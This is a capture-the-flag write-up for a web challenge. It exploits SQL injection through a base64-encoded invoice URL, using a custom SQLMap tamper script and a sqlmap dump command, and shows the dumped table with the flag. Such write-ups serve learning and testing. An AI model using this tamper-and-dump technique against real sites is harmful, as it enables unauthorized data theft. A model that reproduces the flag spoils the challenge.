Stonks Street Journal

Solution

After signing up on the website, we can view our invoice. The invoice URL appears to be in the format /legacy_invoice_system/BASE64_ENCODED_STRING.
This base64-encoded string decodes to USERNAME-YEAR-MONTH-DAY
Adding a ' to the back of the username yielded an SQL error:
1
syntax error at or near "2021"
2
LINE 1: ...riber WHERE username='zeyu2001'' AND signup_date='2021-11-27...
3
^
Copied!
It appears that the input string is split into the username and signup date, and both are passed into the SQL query without sanitization.
We can use a custom SQLMap tamper script that appends the payload to the back of the signup date, and then base64-encodes the entire input string before passing it into the custom injection point at GET /legacy_invoice_system/*
1
import base64
2
from lib.core.enums import PRIORITY
3
โ€‹
4
# Define which is the order of application of tamper scripts against the payload
5
__priority__ = PRIORITY.NORMAL
6
โ€‹
7
def tamper(payload, **kwargs):
8
โ€‹
9
retVal = base64.b64encode(('zeyu2001-2021-11-27' + payload).encode()).decode()
10
11
return retVal
Copied!
Running sqlmap -r invoice.req --tamper tamper.py --threads 10 -T news_article --dump, we can dump the database which contains the flag.
1
Database: public
2
Table: news_article
3
[4 entries]
4
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
5
| id | text | headline | publish_time |
6
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
7
| 1 | My most favourite flag was: CSR{welc0me_0n_b0ard} | Flags are sometimes hard to find, but always beautiful | 2021-11-26 08:33:33.159482+00 |
8
| 2 | <blank> | Elin [Nordegren] said I was obsessed with golf, but when I started sleeping with other women, that wasnโ€™t good enough either. | 2021-11-26 08:33:33.166128+00 |
9
| 3 | <blank> | Struggling to stay on their feet as they stood outside their assigned polling place, the nine members of the U.S. Supreme Court reportedly | 2021-11-26 08:33:33.16646+00 |
10
| 4 | <blank> | Former U.S. secretary of defense Donald Rumsfeld passed away Wednesday at 88 years old, sources confirmed, and is survived by 1 million fewer Iraqis. | 2021-11-26 08:33:33.166761+00 |
11
+----+---------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------+
Copied!
Copy link